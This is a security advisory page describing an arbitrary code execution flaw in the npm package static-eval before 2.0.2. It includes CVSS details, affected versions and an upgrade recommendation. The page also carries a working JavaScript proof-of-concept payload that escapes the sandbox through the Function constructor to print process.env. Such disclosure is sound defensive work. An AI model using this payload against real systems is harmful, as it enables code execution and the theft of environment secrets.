Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXg5aGMtcnczNS1mNDRo
Sandbox Breakout / Arbitrary Code Execution in static-eval
Versions of static-eval
prior to 2.0.2 pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.
Proof of concept
var evaluate = require('static-eval');
var parse = require('esprima').parse;
var src = process.argv[2];
var payload = '(function({x}){return x.constructor})({x:"".sub})("console.log(process.env)")()'
var ast = parse(payload).body[0].expression;
console.log(evaluate(ast, {x:1}));
Recommendation
Upgrade to version 2.0.2 or later.
Permalink: https://github.com/advisories/GHSA-x9hc-rw35-f44hJSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXg5aGMtcnczNS1mNDRo
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: over 3 years ago
Updated: over 1 year ago
CVSS Score: 7.3
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Identifiers: GHSA-x9hc-rw35-f44h
References: Blast Radius: 37.4
Affected Packages
npm:static-eval
Dependent packages: 109Dependent repositories: 132,071
Downloads: 14,120,948 last month
Affected Version Ranges: <= 2.0.1
Fixed in: 2.0.2
All affected versions: 0.0.0, 0.1.0, 0.1.1, 0.2.0, 0.2.1, 0.2.2, 0.2.3, 0.2.4, 1.0.0, 1.1.0, 1.1.1, 2.0.0, 2.0.1
All unaffected versions: 2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.1.0, 2.1.1